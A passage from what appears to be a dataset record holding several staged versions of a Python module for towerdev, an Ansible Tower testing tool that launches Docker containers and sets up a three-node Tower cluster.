.format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': externalPort})\n containersList = dockerClient.containers.list(filters={'name':\n containerName})\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n return creationStatus\n",
"step-2": "<mask token>\n\n\ndef runContainer(purpose, externalPort, osVersion, containerName, debug=\n True, **kwargs):\n \"\"\"Run supplemental container from pre-existing image\"\"\"\n if debug == True:\n runSpecialOpts = dict(purpose=purpose, externalPort=externalPort,\n osVersion=osVersion, containerName=containerName)\n print(runSpecialOpts)\n if purpose == 'ssh':\n if osVersion == 'centos7':\n sshContainer = dockerClient.containers.run('centos7/systemd',\n privileged=False, volumes={'/sys/fs/cgroup': {'bind':\n '/sys/fs/cgroup', 'mode': 'ro'}}, tmpfs={'/tmp': 'exec',\n '/run': ''}, detach=True, name=containerName, ports={\n '22/tcp': externalPort})\n elif osVersion == 'centos8':\n sshContainer = dockerClient.containers.run('centos8/systemd',\n privileged=False, volumes={'/sys/fs/cgroup': {'bind':\n '/sys/fs/cgroup', 'mode': 'ro'}}, tmpfs={'/tmp': 'exec',\n '/run': ''}, detach=True, name=containerName, ports={\n '22/tcp': externalPort})\n containersList = dockerClient.containers.list(filters={'name':\n containerName})\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n return creationStatus\n\n\ndef runContainerCluster(towerVersion, osVersion, namingConvention, stream=\n True, **kwargs):\n \"\"\"Run Tower containers in a clustered setup\"\"\"\n externalPort = None\n containerCount = 3\n debug = True\n loadBalance = False\n if debug:\n runClusterOpts = dict(towerVersion=towerVersion, osVersion=\n osVersion, loadBalance=loadBalance, namingConvention=\n namingConvention, externalPort=externalPort, containerCount=\n containerCount, debug=debug)\n print(runClusterOpts)\n check = towerdev.utilities.imageCheck(towerVersion)\n if check is False:\n print(color(\n 'ERROR: Deployment of container cluster failed. Please make sure the specified version of Tower has an image built.'\n , fg='red'))\n return False\n else:\n for c in range(containerCount):\n runTowerContainer(towerVersion=towerVersion, externalPort=\n externalPort, osVersion=osVersion, containerName='{0}-{1}'.\n format(namingConvention, c))\n clusterContainers = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n containerIps = []\n for c in range(len(clusterContainers)):\n containerIp = clusterContainers[c].attrs['NetworkSettings']['IPAddress'\n ]\n containerIps.append(containerIp)\n print(clusterContainers[0])\n if '3.5' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.5.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.6' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.6.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.7' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.7.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.8' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.8.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n if '3.5' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.6' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.7' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.8' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n setupCmd = (\n '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh\"'.\n format(towerVersion))\n setupLbCmd = (\n '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh -e nginx_disable_https=true\"'\n .format(towerVersion))\n inventoryDbVersion = towerVersion.replace('.', '')\n modifyInventoryDbCmd = (\n \"sed -i 's/XXX/{0}/g' /opt/ansible-tower-setup-{1}-1/inventory\".\n format(inventoryDbVersion, towerVersion))\n runDatabaseCmd = clusterContainers[0].exec_run(cmd=modifyInventoryDbCmd)\n if loadBalance:\n print(color(\n 'INFO: Running ./setup.sh with load balance configuration...',\n fg='yellow'))\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container='{0}-{1}'.\n format(namingConvention, calcRunContainer), cmd=setupLbCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'\n ], stream=True, detach=False)\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = inspect['ExitCode']\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n if setupCmdCode is not 0:\n clusterStatus = False\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupLbCmd)\n else:\n print(color(\n 'INFO: Running ./setup.sh with no load balance configuration...',\n fg='yellow'))\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container='{0}-{1}'.\n format(namingConvention, calcRunContainer), cmd=setupCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'\n ], stream=True, detach=False)\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = inspect['ExitCode']\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n if setupCmdCode is not 0:\n clusterStatus = False\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupCmd)\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n if runSetupCmd[0] is not 0:\n clusterStatus = False\n return clusterStatus\n\n\ndef runTowerContainer(towerVersion, externalPort, osVersion, containerName,\n debug=False, **kwargs):\n \"\"\"Runs Tower container from pre-existing image\"\"\"\n allowedMemory = None\n if debug == True:\n runOpts = dict(towerVersion=towerVersion, externalPort=externalPort,\n osVersion=osVersion, containerName=containerName)\n print(runOpts)\n if not externalPort:\n if allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, mem_limit=allowedMemory, ports={'443/tcp': None}\n )\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': None})\n elif allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, mem_limit=allowedMemory, ports={'443/tcp':\n externalPort})\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': externalPort})\n containersList = dockerClient.containers.list(filters={'name':\n containerName})\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n return creationStatus\n",
"step-3": "<mask token>\ndockerClient = towerdev.common.dockerClient()\n\n\ndef runContainer(purpose, externalPort, osVersion, containerName, debug=\n True, **kwargs):\n \"\"\"Run supplemental container from pre-existing image\"\"\"\n if debug == True:\n runSpecialOpts = dict(purpose=purpose, externalPort=externalPort,\n osVersion=osVersion, containerName=containerName)\n print(runSpecialOpts)\n if purpose == 'ssh':\n if osVersion == 'centos7':\n sshContainer = dockerClient.containers.run('centos7/systemd',\n privileged=False, volumes={'/sys/fs/cgroup': {'bind':\n '/sys/fs/cgroup', 'mode': 'ro'}}, tmpfs={'/tmp': 'exec',\n '/run': ''}, detach=True, name=containerName, ports={\n '22/tcp': externalPort})\n elif osVersion == 'centos8':\n sshContainer = dockerClient.containers.run('centos8/systemd',\n privileged=False, volumes={'/sys/fs/cgroup': {'bind':\n '/sys/fs/cgroup', 'mode': 'ro'}}, tmpfs={'/tmp': 'exec',\n '/run': ''}, detach=True, name=containerName, ports={\n '22/tcp': externalPort})\n containersList = dockerClient.containers.list(filters={'name':\n containerName})\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n return creationStatus\n\n\ndef runContainerCluster(towerVersion, osVersion, namingConvention, stream=\n True, **kwargs):\n \"\"\"Run Tower containers in a clustered setup\"\"\"\n externalPort = None\n containerCount = 3\n debug = True\n loadBalance = False\n if debug:\n runClusterOpts = dict(towerVersion=towerVersion, osVersion=\n osVersion, loadBalance=loadBalance, namingConvention=\n namingConvention, externalPort=externalPort, containerCount=\n containerCount, debug=debug)\n print(runClusterOpts)\n check = towerdev.utilities.imageCheck(towerVersion)\n if check is False:\n print(color(\n 'ERROR: Deployment of container cluster failed. Please make sure the specified version of Tower has an image built.'\n , fg='red'))\n return False\n else:\n for c in range(containerCount):\n runTowerContainer(towerVersion=towerVersion, externalPort=\n externalPort, osVersion=osVersion, containerName='{0}-{1}'.\n format(namingConvention, c))\n clusterContainers = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n containerIps = []\n for c in range(len(clusterContainers)):\n containerIp = clusterContainers[c].attrs['NetworkSettings']['IPAddress'\n ]\n containerIps.append(containerIp)\n print(clusterContainers[0])\n if '3.5' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.5.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.6' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.6.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.7' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.7.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.8' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.8.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n if '3.5' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.6' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.7' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.8' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n setupCmd = (\n '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh\"'.\n format(towerVersion))\n setupLbCmd = (\n '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh -e nginx_disable_https=true\"'\n .format(towerVersion))\n inventoryDbVersion = towerVersion.replace('.', '')\n modifyInventoryDbCmd = (\n \"sed -i 's/XXX/{0}/g' /opt/ansible-tower-setup-{1}-1/inventory\".\n format(inventoryDbVersion, towerVersion))\n runDatabaseCmd = clusterContainers[0].exec_run(cmd=modifyInventoryDbCmd)\n if loadBalance:\n print(color(\n 'INFO: Running ./setup.sh with load balance configuration...',\n fg='yellow'))\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container='{0}-{1}'.\n format(namingConvention, calcRunContainer), cmd=setupLbCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'\n ], stream=True, detach=False)\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = inspect['ExitCode']\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n if setupCmdCode is not 0:\n clusterStatus = False\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupLbCmd)\n else:\n print(color(\n 'INFO: Running ./setup.sh with no load balance configuration...',\n fg='yellow'))\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container='{0}-{1}'.\n format(namingConvention, calcRunContainer), cmd=setupCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'\n ], stream=True, detach=False)\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = inspect['ExitCode']\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n if setupCmdCode is not 0:\n clusterStatus = False\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupCmd)\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n if runSetupCmd[0] is not 0:\n clusterStatus = False\n return clusterStatus\n\n\ndef runTowerContainer(towerVersion, externalPort, osVersion, containerName,\n debug=False, **kwargs):\n \"\"\"Runs Tower container from pre-existing image\"\"\"\n allowedMemory = None\n if debug == True:\n runOpts = dict(towerVersion=towerVersion, externalPort=externalPort,\n osVersion=osVersion, containerName=containerName)\n print(runOpts)\n if not externalPort:\n if allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, mem_limit=allowedMemory, ports={'443/tcp': None}\n )\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': None})\n elif allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, mem_limit=allowedMemory, ports={'443/tcp':\n externalPort})\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': externalPort})\n containersList = dockerClient.containers.list(filters={'name':\n containerName})\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n return creationStatus\n",
"step-4": "<mask token>\nimport towerdev.common\nimport towerdev.utilities\nfrom colors import *\ndockerClient = towerdev.common.dockerClient()\n\n\ndef runContainer(purpose, externalPort, osVersion, containerName, debug=\n True, **kwargs):\n \"\"\"Run supplemental container from pre-existing image\"\"\"\n if debug == True:\n runSpecialOpts = dict(purpose=purpose, externalPort=externalPort,\n osVersion=osVersion, containerName=containerName)\n print(runSpecialOpts)\n if purpose == 'ssh':\n if osVersion == 'centos7':\n sshContainer = dockerClient.containers.run('centos7/systemd',\n privileged=False, volumes={'/sys/fs/cgroup': {'bind':\n '/sys/fs/cgroup', 'mode': 'ro'}}, tmpfs={'/tmp': 'exec',\n '/run': ''}, detach=True, name=containerName, ports={\n '22/tcp': externalPort})\n elif osVersion == 'centos8':\n sshContainer = dockerClient.containers.run('centos8/systemd',\n privileged=False, volumes={'/sys/fs/cgroup': {'bind':\n '/sys/fs/cgroup', 'mode': 'ro'}}, tmpfs={'/tmp': 'exec',\n '/run': ''}, detach=True, name=containerName, ports={\n '22/tcp': externalPort})\n containersList = dockerClient.containers.list(filters={'name':\n containerName})\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n return creationStatus\n\n\ndef runContainerCluster(towerVersion, osVersion, namingConvention, stream=\n True, **kwargs):\n \"\"\"Run Tower containers in a clustered setup\"\"\"\n externalPort = None\n containerCount = 3\n debug = True\n loadBalance = False\n if debug:\n runClusterOpts = dict(towerVersion=towerVersion, osVersion=\n osVersion, loadBalance=loadBalance, namingConvention=\n namingConvention, externalPort=externalPort, containerCount=\n containerCount, debug=debug)\n print(runClusterOpts)\n check = towerdev.utilities.imageCheck(towerVersion)\n if check is False:\n print(color(\n 'ERROR: Deployment of container cluster failed. Please make sure the specified version of Tower has an image built.'\n , fg='red'))\n return False\n else:\n for c in range(containerCount):\n runTowerContainer(towerVersion=towerVersion, externalPort=\n externalPort, osVersion=osVersion, containerName='{0}-{1}'.\n format(namingConvention, c))\n clusterContainers = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n containerIps = []\n for c in range(len(clusterContainers)):\n containerIp = clusterContainers[c].attrs['NetworkSettings']['IPAddress'\n ]\n containerIps.append(containerIp)\n print(clusterContainers[0])\n if '3.5' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.5.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.6' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.6.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.7' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.7.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.8' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.8.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n if '3.5' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.6' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.7' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.8' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n setupCmd = (\n '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh\"'.\n format(towerVersion))\n setupLbCmd = (\n '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh -e nginx_disable_https=true\"'\n .format(towerVersion))\n inventoryDbVersion = towerVersion.replace('.', '')\n modifyInventoryDbCmd = (\n \"sed -i 's/XXX/{0}/g' /opt/ansible-tower-setup-{1}-1/inventory\".\n format(inventoryDbVersion, towerVersion))\n runDatabaseCmd = clusterContainers[0].exec_run(cmd=modifyInventoryDbCmd)\n if loadBalance:\n print(color(\n 'INFO: Running ./setup.sh with load balance configuration...',\n fg='yellow'))\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container='{0}-{1}'.\n format(namingConvention, calcRunContainer), cmd=setupLbCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'\n ], stream=True, detach=False)\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = inspect['ExitCode']\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n if setupCmdCode is not 0:\n clusterStatus = False\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupLbCmd)\n else:\n print(color(\n 'INFO: Running ./setup.sh with no load balance configuration...',\n fg='yellow'))\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container='{0}-{1}'.\n format(namingConvention, calcRunContainer), cmd=setupCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'\n ], stream=True, detach=False)\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = inspect['ExitCode']\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n if setupCmdCode is not 0:\n clusterStatus = False\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupCmd)\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n if runSetupCmd[0] is not 0:\n clusterStatus = False\n return clusterStatus\n\n\ndef runTowerContainer(towerVersion, externalPort, osVersion, containerName,\n debug=False, **kwargs):\n \"\"\"Runs Tower container from pre-existing image\"\"\"\n allowedMemory = None\n if debug == True:\n runOpts = dict(towerVersion=towerVersion, externalPort=externalPort,\n osVersion=osVersion, containerName=containerName)\n print(runOpts)\n if not externalPort:\n if allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, mem_limit=allowedMemory, ports={'443/tcp': None}\n )\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': None})\n elif allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, mem_limit=allowedMemory, ports={'443/tcp':\n externalPort})\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': externalPort})\n containersList = dockerClient.containers.list(filters={'name':\n containerName})\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n return creationStatus\n",
"step-5": "#!/usr/bin/env python3\n\n''' towerdev - Ansible Tower Testing Framework\n\nMIT License\n\nCopyright © 2021 falcon78921\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n'''\n\nimport towerdev.common\nimport towerdev.utilities\nfrom colors import *\n\n# Invoke dockerClient()\n\ndockerClient = towerdev.common.dockerClient()\n\ndef runContainer(purpose, externalPort, osVersion, containerName, debug=True, **kwargs):\n \"\"\"Run supplemental container from pre-existing image\"\"\"\n\n # Optional debug that prints a dict of options\n if debug == True:\n runSpecialOpts = dict(purpose=purpose, externalPort=externalPort, osVersion=osVersion, containerName=containerName)\n print(runSpecialOpts)\n\n # Determines what we do based on purpose\n if purpose == \"ssh\":\n if osVersion == \"centos7\":\n sshContainer = dockerClient.containers.run('centos7/systemd', privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, ports={'22/tcp':externalPort})\n elif osVersion == \"centos8\":\n sshContainer = dockerClient.containers.run('centos8/systemd', privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, ports={'22/tcp':externalPort})\n\n containersList = dockerClient.containers.list(filters={'name': containerName})\n\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n\n return creationStatus\n\ndef runContainerCluster(towerVersion, osVersion, namingConvention, stream=True, **kwargs):\n \"\"\"Run Tower containers in a clustered setup\"\"\"\n # runContainerCluster() defaults; can be overriden via **kwargs\n externalPort = None\n containerCount = 3\n debug = True\n loadBalance = False\n\n # Optional debug that prints a dict of options\n if debug:\n runClusterOpts = 